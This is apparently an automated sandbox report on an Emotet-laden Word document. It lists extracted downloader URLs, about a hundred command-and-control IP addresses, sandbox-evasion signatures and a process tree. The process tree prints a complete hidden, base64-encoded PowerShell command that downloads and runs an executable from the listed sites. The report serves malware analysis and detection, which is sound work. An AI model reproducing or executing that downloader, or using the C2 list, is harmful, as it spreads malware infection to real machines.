Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
09-12-2019 17:11
General
Malware Config
Extracted
http://www.yadegarebastan.com/wp-content/9mg/
http://vikstory.ca/h/k/
https://brelaxmassage.com/wp-includes/BRU8KftsJ/
https://obgyn.toughjobs.org/wp-admin/h6NG/
https://uaeessay.com/wp-admin/mKUMNk/
Extracted
emotet
12.176.19.218:80
66.76.63.99:80
100.14.117.137:80
37.59.24.177:8080
66.34.201.20:7080
108.179.206.219:8080
45.56.88.91:443
176.106.183.253:8080
31.172.240.91:8080
139.130.241.252:443
188.152.7.140:80
110.142.38.16:80
200.71.148.138:8080
87.106.139.101:8080
91.187.80.246:80
195.244.215.206:80
93.147.141.5:80
104.131.11.150:8080
104.236.246.93:8080
181.57.193.14:80
101.187.247.29:80
159.65.25.128:8080
178.209.71.63:8080
87.230.19.21:8080
91.231.166.126:8080
185.159.102.74:80
192.241.255.77:8080
58.171.42.66:8080
78.24.219.147:8080
149.202.153.252:8080
181.143.194.138:443
209.97.168.52:8080
183.102.238.69:465
59.103.164.174:80
116.48.142.21:443
209.141.54.221:8080
206.189.112.148:8080
165.227.156.155:443
165.228.24.197:80
167.114.242.226:8080
110.143.57.109:80
173.70.81.77:80
120.150.246.241:80
62.75.187.192:8080
83.136.245.190:8080
101.187.134.207:443
217.160.182.191:8080
45.51.40.140:80
144.139.247.220:80
91.205.215.66:8080
212.129.24.79:8080
169.239.182.217:8080
108.191.2.72:80
73.11.153.178:8080
197.254.221.174:80
80.11.163.139:21
107.170.24.125:8080
31.31.77.83:443
190.12.119.180:443
211.63.71.72:8080
189.209.217.49:80
167.71.10.37:8080
80.21.182.46:80
212.186.191.177:80
167.99.105.223:7080
186.75.241.230:80
104.131.44.150:8080
1.33.230.137:80
67.225.179.64:8080
37.157.194.134:443
190.56.255.118:80
190.226.44.20:21
201.173.217.124:443
92.186.52.193:80
24.45.193.161:7080
5.196.74.210:8080
201.184.105.242:443
200.7.243.108:443
87.106.136.232:8080
107.2.2.28:80
74.105.102.97:8080
178.210.51.222:8080
190.147.215.53:22
206.81.10.215:8080
92.222.216.44:8080
128.65.154.183:443
91.242.138.5:80
181.31.213.158:8080
212.64.171.206:80
173.13.135.102:80
182.176.132.213:8090
86.98.156.239:443
45.33.49.124:443
50.116.86.205:8080
164.68.101.171:80
176.31.200.130:8080
190.53.135.159:21
190.211.207.11:443
12.229.155.122:80
95.128.43.213:8080
5.88.182.250:80
210.6.85.121:80
70.175.171.251:80
91.73.197.90:80
46.105.131.87:80
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4360 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4360 Powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
415.exe415.exepid process 4552 415.exe 4564 415.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4840 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE415.exe415.exepid process 4840 WINWORD.EXE 4552 415.exe 4564 415.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exePowershell.exe415.exedescription pid process target process PID 328 wrote to memory of 1924 328 SppExtComObj.exe SLUI.exe PID 4360 wrote to memory of 4552 4360 Powershell.exe 415.exe PID 4552 wrote to memory of 4564 4552 415.exe 415.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4840 WINWORD.EXE -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6b4755766b6f0a943acc79bdcc1f348ba24796d6d502491d417a3e119b0d4c24.doc" /o ""1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4840
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:328 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:1924
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABIAGoAZgBiAG0AYwB4AG8AegBtAGEAPQAnAEcAagB2AGEAYgB0AHkAdABnAGIAaABmACcAOwAkAE8AcABtAGIAaQBxAGoAeABoAGsAIAA9ACAAJwA0ADEANQAnADsAJABQAHIAaABwAG8AdAB5AHYAeQBhAGEAagA9ACcASgBiAHAAagBoAGMAZwBuAHcAZwByACcAOwAkAFAAYQBxAGgAZgBlAGQAYwBtAGwAdAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATwBwAG0AYgBpAHEAagB4AGgAawArACcALgBlAHgAZQAnADsAJABCAGgAeQB2AGIAdwBjAHkAaABmAGsAcAA9ACcATwB4AHoAYgBqAGMAZgB3AHoAJwA7ACQAVgBwAHYAbAB3AHoAYwB0AD0ALgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAEUAVAAuAFcAZQBiAGMATABJAEUATgBUADsAJABIAG4AbwBiAGEAdQBiAG0AbwB6AGMAPQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgB5AGEAZABlAGcAYQByAGUAYgBhAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA5AG0AZwAvACoAaAB0AHQAcAA6AC8ALwB2AGkAawBzAHQAbwByAHkALgBjAGEALwBoAC8AawAvACoAaAB0AHQAcABzADoALwAvAGIAcgBlAGwAYQB4AG0AYQBzAHMAYQBnAGUALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEIAUgBVADgASwBmAHQAcwBKAC8AKgBoAHQAdABwAHMAOgAvAC8AbwBiAGcAeQBuAC4AdABvAHUAZwBoAGoAbwBiAHMALgBvAHIAZwAvAHcAcAAtAGEAZABtAGkAbgAvAGgANgBOAEcALwAqAGgAdAB0AHAAcwA6AC8ALwB1AGEAZQBlAHMAcwBhAHkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG0ASwBVAE0ATgBrAC8AJwAuACIAUwBQAGAATABpAHQAIgAoACcAKgAnACkAOwAkAEQAYwBuAGMAdQBiAHgAawB5AHgAbgB6AGYAPQAnAFQAcABiAHcAZQB0AGYAdQBzAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAdwBwAHAAeABzAG0AbwBrACAAaQBuACAAJABIAG4AbwBiAGEAdQBiAG0AbwB6AGMAKQB7AHQAcgB5AHsAJABWAHAAdgBsAHcAegBjAHQALgAiAEQATwBgAHcAbgBgAEwAbwBhAEQAZgBJAGAAbABFACIAKAAkAFMAdwBwAHAAeABzAG0AbwBrACwAIAAkAFAAYQBxAGgAZgBlAGQAYwBtAGwAdAApADsAJABJAGIAcABlAGgAZwB6AHkAdAA9ACcATgBkAG4AZQBkAGsAYQB4AHUAZAB3AGkAcQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFAAYQBxAGgAZgBlAGQAYwBtAGwAdAApAC4AIgBMAGAAZQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMwA2ADUAOAA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAUgBUACIAKAAkAFAAYQBxAGgAZgBlAGQAYwBtAGwAdAApADsAJABDAHgAaAB1AG0AeQB2AHAAagBpAHQAPQAnAEYAegBzAGUAcwBvAHMAcgBwAGMAawByACcAOwBiAHIAZQBhAGsAOwAkAEMAbAB0AHoAaQBlAHQAeAA9ACcAVQBrAG8AaQB4AHUAdQBxAHYAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGQAeABoAGwAdwBtAHUAPQAnAFQAdwB0AGUAcQBqAGsAYgAnAA==1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Users\Admin\415.exe"C:\Users\Admin\415.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\415.exe--dadc45d63⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4564